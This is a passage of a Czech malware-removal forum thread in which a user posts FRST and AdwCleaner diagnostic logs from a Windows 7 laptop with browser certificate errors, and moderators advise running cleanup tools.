Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 94.0.4606.81 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\94.0.4606.81\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2008-10-01 08:02 - 2008-10-01 08:08 - 000011264 _____ () [File not signed] C:\Program Files (x86)\ASUS\Splendid\GLCDdll.dll
2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-04-08 06:38 - 2009-07-10 00:43 - 000052736 _____ (ASUSTeK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\Chameleon.dll
2005-06-03 10:39 - 2006-09-12 01:46 - 000035840 _____ (ASUSTek) [File not signed] C:\Program Files (x86)\ASUS\Splendid\OVS.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000442712 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libegl.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 007866200 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libglesv2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 004401496 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vk_swiftshader.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000733016 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vulkan-1.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 176138584 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 001187672 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome_elf.dll
2021-10-25 16:56 - 2021-10-16 03:20 - 004891080 _____ (Microsoft Corporation -> Microsoft Corporation) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\D3DCompiler_47.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll
2021-07-05 14:22 - 2021-06-11 11:17 - 000571544 _____ (win.rar GmbH -> Alexander Roshal) [File not signed] C:\Program Files\WinRAR\rarext.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 04:52:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Název chybujícího modulu: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Kód výjimky: 0xc0000005
Posun chyby: 0x000000000002687a
ID chybujícího procesu: 0x175c
Čas spuštění chybující aplikace: 0x01d7ca7863a1dab1
Cesta k chybující aplikaci: C:\Users\PC\Desktop\FRST64.exe
Cesta k chybujícímu modulu: C:\Users\PC\Desktop\FRST64.exe
ID zprávy: 50bf50ce-366c-11ec-91ac-90e6ba63844b

Error: (10/26/2021 04:42:35 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:33 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 05:02:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:48 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:38:42 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 40.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 85%
Total physical RAM: 4061.09 MB
Available physical RAM: 587.36 MB
Total Virtual: 8120.32 MB
Available Virtual: 788.01 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.63 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neplatné certifikaty v prohližečích

#2 Příspěvek od Rudy »

Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Uživatelský avatar
JaRon
Moderátor
Moderátor
Příspěvky: 15197
Registrován: 29 bře 2005 13:39
Bydliště: BB-SK

Re: neplatné certifikaty v prohližečích

#3 Příspěvek od JaRon »

Ahoj
stiahni Avptool Kvrt -restartuj do nudzoveho rezimu PC a vycisti s Kvrt pocitac
FRST |ADWCleaner |MBAM |CCleaner |AVPTool

V prípade spokojnosti je možné podporiť fórum
https://platba.viry.cz/payment/

Eddydye
Návštěvník
Návštěvník
Příspěvky: 16
Registrován: 27 kvě 2021 16:55

Re: neplatné certifikaty v prohližečích

#4 Příspěvek od Eddydye »

# -------------------------------
# Malwarebytes AdwCleaner 8.3.0.0
# -------------------------------
# Build: 06-29-2021
# Database: 2021-10-26.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 10-26-2021
# Duration: 00:00:15
# OS: Windows 7 Home Premium
# Cleaned: 33
# Failed: 0


***** [ Services ] *****

Deleted Main Service

***** [ Folders ] *****

Deleted C:\Program Files (x86)\MachinerData

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Toolbar|{21FA44EF-376D-4D53-9B0F-8A89D3229068}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted Preinstalled.ASUSControlDeck Folder C:\Program Files (x86)\ASUS\CONTROLDECK
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{169201BA-EF95-4DBA-A040-93D29590C6AF}
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUSControlDeck
Deleted Preinstalled.ASUSControlDeck Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{5B65EF64-1DFA-414A-8C94-7BB726158E21}
Deleted Preinstalled.ASUSControlDeck Task C:\Windows\System32\Tasks\ASUSCONTROLDECK
Deleted Preinstalled.ASUSFancyStart Folder C:\ASUS.DAT
Deleted Preinstalled.ASUSFancyStart Folder C:\Program Files (x86)\ASUS\FANCYSTART
Deleted Preinstalled.ASUSLiveUpdate Folder C:\Program Files (x86)\ASUS\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C02341A7-0F42-4050-B91B-7BBE20935F36}
